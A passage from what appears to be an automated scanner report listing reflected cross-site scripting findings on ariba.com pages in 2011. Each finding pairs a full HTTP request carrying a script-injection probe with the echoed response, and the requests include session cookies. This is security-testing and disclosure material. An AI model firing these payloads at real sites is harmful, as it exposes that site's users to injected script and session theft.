Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:02 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=848;expires=Wed, 17-Oct-2012 18:18:02 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=404&233dc--><script>alert(1)</script>608e4c4a672=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.40. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b688f"><script>alert(1)</script>818d4b4e7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /404.cfm?pageLocation=404&b688f"><script>alert(1)</script>818d4b4e7c8=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:00 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=838;expires=Wed, 17-Oct-2012 18:18:00 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=404&b688f"><script>alert(1)</script>818d4b4e7c8=1&l=dm" title="Denmark">
...[SNIP]...

1.41. http://www.ariba.com/404.cfm [pageLocation parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The value of the pageLocation request parameter is copied into an HTML comment. The payload 18239--><script>alert(1)</script>081c7f68b1c was submitted in the pageLocation parameter. This input was echoed unmodified in the application's response. The response excerpt below shows the payload inside the double-quoted href of the nordics.ariba.com language link rather than inside a comment; the comment-context reflection reported here is not visible in the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /404.cfm?pageLocation=40418239--><script>alert(1)</script>081c7f68b1c HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:17:58 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=831;expires=Wed, 17-Oct-2012 18:17:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=40418239--><script>alert(1)</script>081c7f68b1c&l=dm" title="D&#228;nemark">
...[SNIP]...

1.42. http://www.ariba.com/404.cfm [pageLocation parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The value of the pageLocation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124e"><script>alert(1)</script>354d4e60877 was submitted in the pageLocation parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /404.cfm?pageLocation=404e124e"><script>alert(1)</script>354d4e60877 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:17:56 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=821;expires=Wed, 17-Oct-2012 18:17:56 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=404e124e"><script>alert(1)</script>354d4e60877&l=dm" title="Denmark">
...[SNIP]...

1.43. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /contact.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a655f--><script>alert(1)</script>0dc3e6f4beb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The response excerpt below shows the payload inside the double-quoted href of the nordics.ariba.com language link rather than inside a comment; the comment-context reflection reported here is not visible in the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contact.cfm?a655f--><script>alert(1)</script>0dc3e6f4beb=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/404.cfm?pageLocation=404
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; ALPersonId=13N33417; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=623; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.21.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=100; gpv_pn=%2F404.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252F404.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fcontact.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:17 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=885;expires=Wed, 17-Oct-2012 18:18:17 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/contact.cfm?a655f--><script>alert(1)</script>0dc3e6f4beb=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.44. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /contact.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dab2"><script>alert(1)</script>14911a9ec02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.cfm?2dab2"><script>alert(1)</script>14911a9ec02=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/404.cfm?pageLocation=404
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; ALPersonId=13N33417; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=623; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.21.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=100; gpv_pn=%2F404.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252F404.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fcontact.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:13 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=878;expires=Wed, 17-Oct-2012 18:18:13 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/contact.cfm?2dab2"><script>alert(1)</script>14911a9ec02=1&l=dm" title="Denmark">
...[SNIP]...

1.45. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The value of the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f8e3"><script>alert(1)</script>92572bbccc0 was submitted in the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter. This input was echoed unmodified in the application's response. The odd parameter name is the URL-encoded form of the probe string from finding 1.47: the scanner used that earlier request as the base for this one (compare the Referer header below), so this is the same reflection point exercised through a parameter value rather than a parameter name.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14f8e3"><script>alert(1)</script>92572bbccc0 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; gpv_pn=%2Froles%2Fit.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.11.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=38; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=26

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=391;expires=Wed, 17-Oct-2012 18:05:40 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14f8e3"><script>alert(1)</script>92572bbccc0&l=dm" title="Denmark">
...[SNIP]...

1.46. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The value of the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 request parameter is copied into an HTML comment. The payload 4483a--><script>alert(1)</script>e950b37fe07 was submitted in the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter. This input was echoed unmodified in the application's response. As in 1.45, the parameter name is the URL-encoded probe string from finding 1.47, reused by the scanner as the base request (see the Referer header below). The response excerpt below shows the payload inside the double-quoted href of the nordics.ariba.com language link rather than inside a comment; the comment-context reflection reported here is not visible in the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14483a--><script>alert(1)</script>e950b37fe07 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; gpv_pn=%2Froles%2Fit.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.11.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=38; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=26

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:43 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=394;expires=Wed, 17-Oct-2012 18:05:43 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=14483a--><script>alert(1)</script>e950b37fe07&l=dm" title="D&#228;nemark">
...[SNIP]...

1.47. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2e6"><script>alert(1)</script>ee10b37ba61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /legal/en_webtrust.cfm?7e2e6"><script>alert(1)</script>ee10b37ba61=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:02:10 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=26;expires=Wed, 17-Oct-2012 18:02:10 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?7e2e6"><script>alert(1)</script>ee10b37ba61=1&l=dm" title="Denmark">
...[SNIP]...

1.48. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ac553--><script>alert(1)</script>6aedde591de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The response excerpt below shows the payload inside the double-quoted href of the nordics.ariba.com language link rather than inside a comment; the comment-context reflection reported here is not visible in the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legal/en_webtrust.cfm?ac553--><script>alert(1)</script>6aedde591de=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; LANGUAGEID=en

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:02:14 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=36;expires=Wed, 17-Oct-2012 18:02:14 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/legal/en_webtrust.cfm?ac553--><script>alert(1)</script>6aedde591de=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.49. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /roles/it.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e864"><script>alert(1)</script>4a0c0970880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /roles/it.cfm?4e864"><script>alert(1)</script>4a0c0970880=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; s_ppv=100; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=125; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Froles%25252Fit.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=350;expires=Wed, 17-Oct-2012 18:05:15 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/roles/it.cfm?4e864"><script>alert(1)</script>4a0c0970880=1&l=dm" title="Denmark">
...[SNIP]...

1.50. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /roles/it.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 99487--><script>alert(1)</script>6b84c1d7b2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /roles/it.cfm?99487--><script>alert(1)</script>6b84c1d7b2d=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
